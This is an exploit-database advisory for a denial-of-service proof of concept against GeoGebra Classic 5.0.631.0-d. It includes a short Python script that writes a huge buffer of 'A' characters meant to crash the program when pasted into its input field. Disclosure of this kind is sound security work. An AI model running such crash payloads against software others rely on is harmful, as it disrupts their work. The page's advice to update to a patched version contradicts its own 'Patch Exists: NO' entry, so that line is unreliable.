GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)

vendor:

GeoGebra Classic

by:

Brian Rodriguez

5.5

CVSS

MEDIUM

Denial of Service

400

CWE

Product Name: GeoGebra Classic

Affected Version From: 5.0.631.0-d

Affected Version To: 5.0.631.0-d

Patch Exists: NO

Related CWE:

CPE: a:geogebra:geogebra_classic:5.0.631.0-d

Metasploit:

Other Scripts:

Platforms Tested: Windows 8.1 Pro

2021

GeoGebra Classic 5.0.631.0-d – Denial of Service (PoC)

The GeoGebra Classic version 5.0.631.0-d is vulnerable to a denial of service (DoS) attack. By running a specially crafted Python script, an attacker can create a payload.txt file with a large amount of data, causing the GeoGebra program to crash when the content of the file is pasted in the 'Entrada' field.

Mitigation:

To mitigate this vulnerability, users are advised to update to a patched version of GeoGebra Classic.

Source

Exploit-DB raw data:

# Exploit Title: GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)
# Date: 2021-03-15
# Exploit Author: Brian Rodriguez
# Vendor Homepage: https://www.geogebra.org
# Software Link: https://www.geogebra.org/download
# Version: 5.0.631.0-d
# Tested on: Windows 8.1 Pro

#STEPS
# Open the program GeoGebra
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content in the field "Entrada:"
# Crashed

--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 800000

try:
    f = open("payload.txt","w")
    f.write(buffer)
    f.close()
    print ("File created")
except:
    print ("File cannot be created")